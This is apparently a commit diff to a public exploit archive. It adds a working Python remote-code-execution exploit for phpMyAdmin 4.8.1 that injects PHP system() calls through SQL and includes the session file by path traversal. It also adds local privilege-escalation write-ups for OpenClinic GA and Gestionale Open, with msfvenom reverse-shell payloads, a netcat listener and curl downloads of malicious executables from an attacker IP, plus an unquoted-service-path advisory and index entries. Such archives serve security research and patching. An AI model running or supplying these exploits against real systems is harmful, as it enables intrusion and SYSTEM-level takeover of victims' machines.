} else {
console.log("Arbitrary file deletion of " + thumb + " failed!")
return false
}
})
}

96
exploits/php/webapps/50457.py Executable file
View file

@ -0,0 +1,96 @@
# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
# Date: 17/08/2021
# Exploit Author: samguy
# Vulnerability Discovery By: ChaMd5 & Henry Huang
# Vendor Homepage: http://www.phpmyadmin.net
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
# Version: 4.8.1
# Tested on: Linux - Debian Buster (PHP 7.3)
# CVE : CVE-2018-12613
#!/usr/bin/env python
import re, requests, sys
# check python major version
if sys.version_info.major == 3:
import html
else:
from six.moves.html_parser import HTMLParser
html = HTMLParser()
if len(sys.argv) < 7:
usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
print(usage.format(sys.argv[0],sys.argv[0]))
exit()
def get_token(content):
s = re.search('token"\s*value="(.*?)"', content)
token = html.unescape(s.group(1))
return token
ipaddr = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
command = sys.argv[6]
url = "http://{}:{}{}".format(ipaddr,port,path)
# 1st req: check login page and version
url1 = url + "/index.php"
r = requests.get(url1)
content = r.content.decode('utf-8')
if r.status_code != 200:
print("Unable to find the version")
exit()
s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
version = s.group(1)
if version != "4.8.0" and version != "4.8.1":
print("The target is not exploitable".format(version))
exit()
# get 1st token and cookie
cookies = r.cookies
token = get_token(content)
# 2nd req: login
p = {'token': token, 'pma_username': username, 'pma_password': password}
r = requests.post(url1, cookies = cookies, data = p)
content = r.content.decode('utf-8')
s = re.search('logged_in:(\w+),', content)
logged_in = s.group(1)
if logged_in == "false":
print("Authentication failed")
exit()
# get 2nd token and cookie
cookies = r.cookies
token = get_token(content)
# 3rd req: execute query
url2 = url + "/import.php"
# payload
payload = '''select '<?php system("{}") ?>';'''.format(command)
p = {'table':'', 'token': token, 'sql_query': payload }
r = requests.post(url2, cookies = cookies, data = p)
if r.status_code != 200:
print("Query failed")
exit()
# 4th req: execute payload
session_id = cookies.get_dict()['phpMyAdmin']
url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
r = requests.get(url3, cookies = cookies)
if r.status_code != 200:
print("Exploit failed")
exit()
# get result
content = r.content.decode('utf-8', errors="replace")
s = re.search("select '(.*?)\n'", content, re.DOTALL)
if s != None:
print(s.group(1))

35
exploits/windows/local/50443.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path
# Exploit Author: Mert DAŞ
# Version: 2.4.64
# Date: 23.10.2021
# Vendor Homepage: https://www.netgear.com/
# Tested on: Windows 10
C:\Users\Mert>sc qc NETGEARGenieDaemon
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NETGEARGenieDaemon
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NETGEAR
Genie\bin\NETGEARGenieDaemon64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGEARGenieDaemon
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Or:
-------------------------
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.

95
exploits/windows/local/50448.txt Normal file
View file

@ -0,0 +1,95 @@
# Exploit Title: OpenClinic GA 5.194.18 - Local Privilege Escalation
# Date: 2021-07-24
# Author: Alessandro Salzano
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/files/latest/download
# Version: 5.194.18
# Tested on: Microsoft Windows 10 Enterprise x64
Open Source Integrated Hospital Information Management System.
OpenClinic GA is an open source integrated hospital information management system covering management of administrative, financial, clinical, lab, x-ray, pharmacy, meals distribution and other data. Extensive statistical and reporting capabilities.
Vendor: OpenClinic GA.
Affected version: > 5.194.18
# Details
# By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below.
# A low privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
The application also have unquoted service path issues.
(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:
C:\projects\openclinic\mariadb\bin\mysqld.exe
Details:
SERVICE_NAME: OpenClinicHttp
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\projects\openclinic\tomcat8\bin\tomcat8.exe //RS//OpenClinicHttp
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OpenClinicHttp
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : NT Authority\LocalServic
--------
SERVICE_NAME: OpenClinicMySQL
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=c:/projects/openclinic/mariadb/my.ini OpenClinicMySQL
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OpenClinicMySQL
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
(2) Folder permissions.
Insecure folders permissions issue:
icacls C:\projects\openclinic
C:\projects\openclinic Everyone:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
# Proof of Concept
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start
3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"
4. Overwrite file and copy malicious .exe.
Renename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
5. Restart victim machine
6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

80
exploits/windows/local/50449.txt Normal file
View file

@ -0,0 +1,80 @@
# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Homepage: https://www.gestionaleopen.org/
# Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe
# Version: 11.00.00
# Tested on: Microsoft Windows 10 Enterprise x64
With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation.
Vendor: Gestionale Open srl.
Affected version: > 11.00.00
# Details
# By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
The application also have unquoted service path issues.
(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:
C:\Gestionale_Open\MySQL57\bin\mysqld.exe
Details:
SERVICE_NAME: DB_GO
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DB_GO
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
(2) Folder permissions.
Insecure folders permissions issue:
C:\Gestionale_Open Everyone:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
# Proof of Concept
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start
3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe"
4. Overwrite file and copy malicious .exe.
Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
5. Restart victim machine
6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

17
files_exploits.csv
View file

@ -11352,6 +11352,9 @@ id,file,description,date,author,type,platform,port
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50448,exploits/windows/local/50448.txt,"OpenClinic GA 5.194.18 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
50449,exploits/windows/local/50449.txt,"Gestionale Open 11.00.00 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44270,6 +44273,7 @@ id,file,description,date,author,type,platform,port
50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php,
50441,exploits/hardware/webapps/50441.py,"Hikvision Web Server Build 210702 - Command Injection",1970-01-01,bashis,webapps,hardware,
50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@ -44393,3 +44397,16 @@ id,file,description,date,author,type,platform,port
50438,exploits/java/webapps/50438.txt,"Jetty 9.4.37.v20210219 - Information Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",1970-01-01,"Pablo Santiago",webapps,php,
50440,exploits/php/webapps/50440.txt,"Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)",1970-01-01,"Sam Ferguson",webapps,php,
50442,exploits/php/webapps/50442.txt,"WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Akash Patil",webapps,php,
50444,exploits/php/webapps/50444.txt,"Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)",1970-01-01,SadKris,webapps,php,
50445,exploits/asp/webapps/50445.txt,"Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)",1970-01-01,"Nehru Sethuraman",webapps,asp,
50446,exploits/multiple/webapps/50446.sh,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)",1970-01-01,ThelastVvV,webapps,multiple,
50447,exploits/php/webapps/50447.txt,"Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)",1970-01-01,blockomat2100,webapps,php,
50450,exploits/php/webapps/50450.txt,"Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)",1970-01-01,"Alon Leviev",webapps,php,
50451,exploits/php/webapps/50451.txt,"Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Alon Leviev",webapps,php,
50452,exploits/php/webapps/50452.txt,"Engineers Online Portal 1.0 - 'multiple' Authentication Bypass",1970-01-01,"Alon Leviev",webapps,php,
50453,exploits/php/webapps/50453.txt,"Engineers Online Portal 1.0 - 'id' SQL Injection",1970-01-01,"Alon Leviev",webapps,php,
50454,exploits/php/webapps/50454.txt,"WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Akash Patil",webapps,php,
50455,exploits/php/webapps/50455.txt,"WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Akash Patil",webapps,php,
50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",1970-01-01,samguy,webapps,php,
50457,exploits/php/webapps/50457.py,"phpMyAdmin 4.8.1 - Remote Code Execution (RCE)",1970-01-01,samguy,webapps,php,

Can't render this file because it is too large.